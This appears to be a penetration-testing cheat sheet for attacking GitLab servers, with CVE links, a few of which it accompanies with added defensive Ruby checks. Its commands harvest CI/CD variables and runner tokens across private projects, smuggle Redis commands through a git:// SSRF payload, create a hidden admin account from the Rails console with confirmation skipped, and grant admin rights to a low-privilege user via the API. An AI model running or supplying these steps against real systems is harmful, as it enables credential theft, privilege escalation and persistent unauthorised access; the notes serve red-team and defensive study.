# GitLab

* <https://devcraft.io/assets/hacktivitycon-slides.pdf>
* <https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/>
* <https://github.com/dotPY-hax/gitlab_RCE>

## Search for Secrets

* <https://embracethered.com/blog/posts/2022/hacking-gitlab-servers/>
* <https://rtfm.co.ua/en/git-scanning-repositories-for-secrets-using-gitleaks/>

Search for CI/CD variables and runner tokens:

```bash
TOKEN=$(cat token)
GITLAB=gitlab.megacorp.local
API="https://$GITLAB/api/v4"

# Sanity check: whose token is this and what can it see?
curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq

# 1. bash get_project_ids.sh <PAGE_NUMBER> | tee -a projects
#    Lists private project IDs of a group (subgroups included), 100 per page.
#    A group path must be URL-encoded (e.g. group%2Fsubgroup) when used instead of the numeric ID.
curl -sH "Authorization: Bearer $TOKEN" "$API/groups/<GROUP_NAME_OR_ID>/projects?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id'

# 2. bash get_secrets.sh
#    For every collected project: its path, its CI/CD variables and its runner registration token.
for id in $(cat projects); do
    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq -r '.path'

    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq

    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq -r '.runners_token'
done
```
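The same `/projects/:id/variables` response, read from the defender's side: an added audit script (not part of the original notes) that flags credential-looking CI/CD variables that are unmasked, unprotected or scoped to every environment. The JSON sample and the key pattern are constructed assumptions; pipe the real API output in via a file argument.

```ruby
require 'json'

# Constructed sample response (not from a real instance); the real one comes
# from: curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables"
SAMPLE_VARIABLES_JSON = <<~JSON
  [
    {"variable_type":"env_var","key":"AWS_SECRET_ACCESS_KEY","value":"REDACTED","protected":false,"masked":false,"environment_scope":"*"},
    {"variable_type":"env_var","key":"DEPLOY_TOKEN","value":"REDACTED","protected":true,"masked":true,"environment_scope":"production"},
    {"variable_type":"file","key":"KUBECONFIG","value":"REDACTED","protected":false,"masked":true,"environment_scope":"*"}
  ]
JSON

# Keys that look like credentials; an assumed list, tune it for the environment.
SECRET_KEY_PATTERN = /secret|token|password|passwd|key|kubeconfig|credential/i

# Returns one finding per credential-looking variable that is exposed more
# widely than it should be: { key:, type:, scope:, reasons: [...] }.
def weak_variables(json)
  JSON.parse(json).filter_map do |var|
    next unless var['key'].match?(SECRET_KEY_PATTERN)
    reasons = []
    # Unmasked values are printed verbatim when a job dumps its environment.
    reasons << 'not masked' unless var['masked']
    # Unprotected variables reach jobs on any branch or merge request, so
    # anyone who can push a branch can read them from a pipeline they start.
    reasons << 'not protected' unless var['protected']
    # Wildcard scope hands the value to every environment, not just production.
    reasons << 'wildcard environment scope' if var['environment_scope'] == '*'
    next if reasons.empty?
    { key: var['key'], type: var['variable_type'], scope: var['environment_scope'], reasons: reasons }
  end
end

if __FILE__ == $PROGRAM_NAME
  json = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_VARIABLES_JSON
  weak_variables(json).each do |f|
    puts "#{f[:key]} [#{f[:type]}, scope=#{f[:scope]}]: #{f[:reasons].join(', ')}"
  end
end
```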

Search for credential leaks with [gitleaks](https://github.com/zricethezav/gitleaks):

```bash
$ eget -qs linux/amd64 "zricethezav/gitleaks" --to gitleaks
$ TMPFILE=$(mktemp); ./gitleaks detect -s . -v -r "$TMPFILE" > /dev/null; jq . "$TMPFILE"; rm "$TMPFILE"
```

## GitLab Runners Abuse

* <https://frichetten.com/blog/abusing-gitlab-runners/>
* <https://github.com/Frichetten/gitlab-runner-research>

## SSRF > Redis > RCE (CE/EE)

**CVE-2018-19571, CVE-2018-19585**

* <https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41293>
* <https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/>
* <https://www.exploit-db.com/exploits/49334>

It is also possible to use this payload (instead of the IPv6 trick) to bypass the localhost filter checks, but it only works with the `git://` scheme:

```
git://127.0.0.1:6379/%0a<REDIS_COMMANDS>
```
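The fix side of the two bypasses above (a non-HTTP scheme and an encoded newline in the path): an added minimal import-URL check, written here as an illustration and not GitLab's own `Gitlab::UrlBlocker`. Only literal IP hosts are classified offline; a real deployment must additionally resolve every hostname (including shorthand like `127.1`) and re-check each returned address.

```ruby
require 'uri'
require 'ipaddr'

ALLOWED_SCHEMES = %w[http https].freeze

# Loopback, unspecified, link-local and private ranges, IPv4 and IPv6.
BLOCKED_RANGES = %w[
  127.0.0.0/8 0.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 169.254.0.0/16
  ::1/128 ::/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }.freeze

# Returns nil when the URL is acceptable, otherwise a short rejection reason.
def import_url_rejection(raw)
  # A CR/LF, encoded or not, lets the path smuggle protocol lines into
  # whatever service the URL reaches; reject before the URI is even parsed.
  return 'control characters in URL' if raw.match?(/%0[ad]|[\r\n]/i)
  uri = URI.parse(raw)
  # Scheme allowlist: git:// (and anything else non-HTTP) never passes.
  return 'scheme not allowed' unless ALLOWED_SCHEMES.include?(uri.scheme)
  host = uri.hostname   # brackets around IPv6 literals are already stripped
  return 'missing host' if host.nil? || host.empty?
  ip = begin
    IPAddr.new(host)
  rescue IPAddr::InvalidAddressError
    nil   # not a full literal address: treat as a hostname (must be resolved)
  end
  if ip
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so the IPv4 ranges apply.
    ip = ip.native if ip.ipv6? && ip.ipv4_mapped?
    return 'host is a local or private address' if BLOCKED_RANGES.any? { |r| r.include?(ip) }
  elsif host.casecmp?('localhost') || host.downcase.end_with?('.localhost')
    return 'host is localhost'
  end
  nil
rescue URI::InvalidURIError
  'unparseable URL'
end

def safe_import_url?(raw)
  import_url_rejection(raw).nil?
end
```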

## Path Traversal > LFI > RCE (CE/EE)

**CVE-2020-10977**

* <https://xakep.ru/2020/05/26/gitlab-exploit/>
* <https://www.exploit-db.com/exploits/49076>

## Path Traversal > File Write > RCE (EE)

**CVE-2019-19088**

* <https://gitlab.com/gitlab-org/gitlab/-/issues/36029>

## gitlab-rails

* <https://docs.gitlab.com/ee/user/profile/account/create_accounts.html>

Add new admin user from console:

```ruby
$ sudo gitlab-rails console
irb(main):001:0 > ActiveRecord::Base.logger = Logger.new($stdout)
irb(main):002:0 > User.find(1)
=> #<User id:1 @root>
irb(main):003:0 > user = User.create(:username => 'snovvcrash', :password => 'Passw0rd!', :password_confirmation => 'Passw0rd!', :admin => true, :name => 'snovvcrash', :email => 'snovvcrash@megacorp.local')
irb(main):004:0 > user.save!
irb(main):005:0 > user.confirmation_token
=> "ZVrM4KsyEdSoTJvo8kx_"
```

Then activate the account by navigating to `https://gitlab.megacorp.local/users/confirmation?confirmation_token=ZVrM4KsyEdSoTJvo8kx_`.

Or just skip the email confirmation step:

```ruby
irb(main):003:0 > user.skip_confirmation!
irb(main):004:0 > user.save!
```

For GitLab >= 16.11 a personal namespace must also be assigned:

```ruby
irb(main):003:0 > user.assign_personal_namespace(Organizations::Organization.default_organization)
irb(main):004:0 > user.save!
```

Enable password authentication for the web UI (e.g. when only LDAP authentication is available):

```ruby
$ sudo gitlab-rails console
irb(main):001:0 > Gitlab::CurrentSettings.update!(password_authentication_enabled_for_web: true)
irb(main):002:0 > exit
$ sudo gitlab-ctl reconfigure
```

Grant a low-priv user admin's privileges via API:

```bash
# Check token privileges
$ curl -sX GET -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/user" | jq '.is_admin'
# Grant low-priv user admin's privileges
$ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=true" | jq '.is_admin'
# Revert low-priv user's original privileges
$ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=false" | jq '.is_admin'
```

## Arbitrary File Read

**CVE-2023-2825**

* <https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/>
* <https://github.com/Occamsec/CVE-2023-2825#cve-2023-2825>
